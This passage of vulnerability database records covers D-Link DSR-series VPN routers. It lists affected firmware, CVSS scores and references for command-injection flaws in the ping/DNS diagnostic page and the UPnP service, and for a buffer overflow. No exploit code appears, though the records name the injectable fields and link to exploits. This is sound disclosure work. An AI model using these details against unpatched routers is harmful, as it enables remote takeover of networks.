"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Severity ?
Summary
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
"versionEndIncluding": "1.05b48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
"versionEndIncluding": "1.08b29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
"matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
"matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
"matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
"matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
},
{
"lang": "es",
"value": "La funci\u00f3n runShellCmd en systemCheck.htm en D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.05B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR500, DSR-500N, DSR-1000, y DSR-100N con firmware anterior a 1.08B77 permite a atacantes remotos ejecutar comandos arbitrarios a trav\u00e9s de metacaracteres de la consola en la secci\u00f3n (1) \"Ping or Trace an IP Address\" o (2) \"Perform a DNS Lookup\"."
}
],
"id": "CVE-2013-5946",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-12-19T04:24:51.930",
"references": [
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "cve@mitre.org",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-02-02 14:15
Modified
2024-11-21 05:08
Severity ?
Summary
The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a | Exploit, Third Party Advisory | |
| cve@mitre.org | https://www.dlink.com/en/security-bulletin/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.dlink.com/en/security-bulletin/ | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-250_firmware | 3.14 | |
| dlink | dsr-250 | - | |
| dlink | dsr-1000n_firmware | 2.11b201 | |
| dlink | dsr-1000n | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:3.14:*:*:*:*:*:*:*",
"matchCriteriaId": "45DCFBB4-008A-4D44-B566-CEC4F0EDF56A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:2.11b201:*:*:*:*:*:*:*",
"matchCriteriaId": "BE93CCFE-AF5E-4FF9-B68C-2B364E93B9CA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
},
{
"lang": "es",
"value": "El servicio UPnP de D-Link DSR-250 (3.14) DSR-1000N (2.11B201), contiene una vulnerabilidad de inyecci\u00f3n de comandos, que puede causar una ejecuci\u00f3n de comandos remota"
}
],
"id": "CVE-2020-18568",
"lastModified": "2024-11-21T05:08:39.290",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-02-02T14:15:11.327",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2025-01-28 22:15
Modified
2025-07-01 15:15
Severity ?
Summary
Buffer Overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to execute remote code execution.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://www.dlink.com/en/security-bulletin/ | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-150_firmware | * | |
| dlink | dsr-150 | - | |
| dlink | dsr-150n_firmware | * | |
| dlink | dsr-150n | - | |
| dlink | dsr-250_firmware | * | |
| dlink | dsr-250 | - | |
| dlink | dsr-250n_firmware | * | |
| dlink | dsr-250n | - | |
| dlink | dsr-500_firmware | * | |
| dlink | dsr-500 | - | |
| dlink | dsr-1000n_firmware | * | |
| dlink | dsr-1000n | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9B310A40-D26D-4C06-B3FF-15AB47406909",
"versionEndIncluding": "3.17B901C",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94821C08-DF39-4150-B3EB-CF6B74A5E971",
"versionEndIncluding": "3.17B901C",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FE39937-BD26-4543-B716-F33BE64E86B0",
"versionEndIncluding": "3.17B901C",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D489612E-5E25-4CE0-8CA4-00AA2DC8C9F2",
"versionEndIncluding": "3.17B901C",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
